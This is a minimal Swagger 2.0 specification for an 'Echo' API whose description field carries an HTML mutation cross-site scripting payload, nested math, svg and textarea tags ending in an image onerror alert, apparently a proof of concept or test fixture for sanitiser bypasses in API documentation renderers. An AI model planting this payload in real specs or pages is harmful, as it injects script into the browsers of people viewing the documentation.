swagger: '2.0'
info:
  version: 1.0.0
  title: Echo
  description: '<math><mtext><option><fake><option></option><mglyph><svg><mtext><textarea><a class="</textarea> <img src=x onerror=alert(document.domain)>">'
paths:
  /:
    get:
      responses:
        '200':
          description: Echo GET
